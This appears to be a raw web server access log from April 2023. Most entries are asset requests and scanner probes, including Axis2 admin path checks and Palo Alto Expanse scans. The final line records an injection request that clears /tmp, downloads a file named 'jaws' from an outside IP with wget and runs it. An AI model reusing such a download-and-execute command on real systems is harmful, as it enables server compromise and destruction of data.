165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/plugins/aos/aos.js HTTP/1.1" 200 4699 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/553.54 (KHTML, like Gecko) Chrome/68.0.2653 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/plugins/owl.carousel/owl.carousel.min.js HTTP/1.1" 200 11412 "-" "Mozilla/5.0 (Windows NT 7_0_2; Win64; x64) AppleWebKit/535.50 (KHTML, like Gecko) Chrome/73.0.439 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/plugins/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 14966 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/597.55 (KHTML, like Gecko) Chrome/107.0.619 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/js/jQuery.min.v3.5.1.js HTTP/1.1" 200 30908 "-" "Mozilla/5.0 (Windows NT 8_2_2; Win64; x64) AppleWebKit/555.53 (KHTML, like Gecko) Chrome/86.0.2401 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/plugins/waypoints/jquery.waypoints.min.js HTTP/1.1" 200 2753 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0) AppleWebKit/539.36 (KHTML, like Gecko) Chrome/72.0.2046 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:17 +0000] "GET /assets/admin/base/js/toastr.min.js HTTP/1.1" 200 2013 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/579.41 (KHTML, like Gecko) Chrome/55.0.2131 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:17 +0000] "GET /assets/front/10bucksonly/plugins/isotope-layout/isotope.pkgd.min.js HTTP/1.1" 200 9847 "-" "Mozilla/5.0 (Windows NT 8_2_2; Win64; x64) AppleWebKit/602.38 (KHTML, like Gecko) Chrome/50.0.1880 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:17 +0000] "GET /sitemap.xml HTTP/1.1" 200 429 "-" "Mozilla/5.0 (Windows NT 7_1; Win64; x64) AppleWebKit/563.47 (KHTML, like Gecko) Chrome/89.0.782 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:17 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/563.45 (KHTML, like Gecko) Chrome/62.0.2628 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:19 +0000] "GET /axis2-admin/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:19 +0000] "GET /axis2-admin HTTP/1.1" 200 - "http://13.244.159.169/axis2-admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:20 +0000] "GET /axis2/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:21 +0000] "GET /axis2 HTTP/1.1" 200 - "http://13.244.159.169/axis2/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:21 +0000] "GET /axis2/axis2-admin/ HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:22 +0000] "GET /axis2/axis2-admin HTTP/1.1" 200 - "http://13.244.159.169/axis2/axis2-admin/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
198.235.24.142 - - [04/Apr/2023:09:07:25 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.181.104 - - [04/Apr/2023:09:08:26 +0000] "\x16\x03\x01" 400 226 "-" "-"
34.85.177.61 - - [04/Apr/2023:09:14:54 +0000] "\x16\x03\x01" 400 226 "-" "-"
34.85.177.61 - - [04/Apr/2023:09:14:57 +0000] "OPTIONS / HTTP/1.0" 200 - "-" "-"
139.144.225.136 - - [04/Apr/2023:09:19:25 +0000] "\x16\x03\x01\x01\xfd\x01" 400 226 "-" "-"
43.154.128.189 - - [04/Apr/2023:09:23:04 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
143.255.1.214 - - [04/Apr/2023:09:25:33 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+161.35.208.230/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
